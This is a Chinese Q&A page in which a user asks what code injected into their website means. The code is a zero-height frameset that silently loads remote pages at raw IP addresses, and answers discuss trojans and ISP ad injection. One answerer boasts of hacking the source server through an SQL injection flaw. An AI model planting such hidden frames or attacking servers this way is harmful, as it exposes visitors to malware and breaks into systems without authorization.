UC知道网站被挂木马,麻烦解释一下这段代码的含义!
来源:百度知道 编辑:UC知道 时间:2024/05/28 09:38:17
<HTML><frameset border='0' frameSpacing='0' rows='0,100%' frameBorder='0'>
<frame id ='frm123' name='frm123' src='http://124.128.255.69:8787/ndatin.aspx?param=ABdXNlcm5hbWU9bGE5OTM4ODAxJnBvbGljeWlkPTIz&ref=1'><frame id ='frmOLD' name='frmOLD' src='http://www.xxx.com/20061010/230.html?'></frameset></HTML>
<frame id ='frm123' name='frm123' src='http://124.128.255.69:8787/ndatin.aspx?param=ABdXNlcm5hbWU9bGE5OTM4ODAxJnBvbGljeWlkPTIz&ref=1'><frame id ='frmOLD' name='frmOLD' src='http://www.xxx.com/20061010/230.html?'></frameset></HTML>
浏览器打开网页时,同时以高和宽为0框架(这样是看不到网页的)打开上面的网页.
木马就放在这两个页面上面.可以顺藤摸瓜.
一般人挂马都用<iframe>,他却用<frame>
我告诉你,不一定是网站上挂的,我也截获过这种代码,是有人在路由上纺织了广告测试程序.
那次我顺藤摸瓜,找到他们的服务器。居然存在“SQL注入漏洞”,于是整了Y的!
<HTML><frameset border='0' frameSpacing='0' rows='0,100%' frameBorder='0'>
<frame id ='frm123' name='frm123' src='http://220.167.29.103:9123/ndatin.aspx?param=ABdXNlcm5hbWU9Z2EyMjIzNzA2JnBvbGljeWlkPTM=&ref=1'><frame id ='frmOLD' name='frmOLD' src='http://ssssss?'></frameset></HTML>
这个是我的电信广告。每天都要弹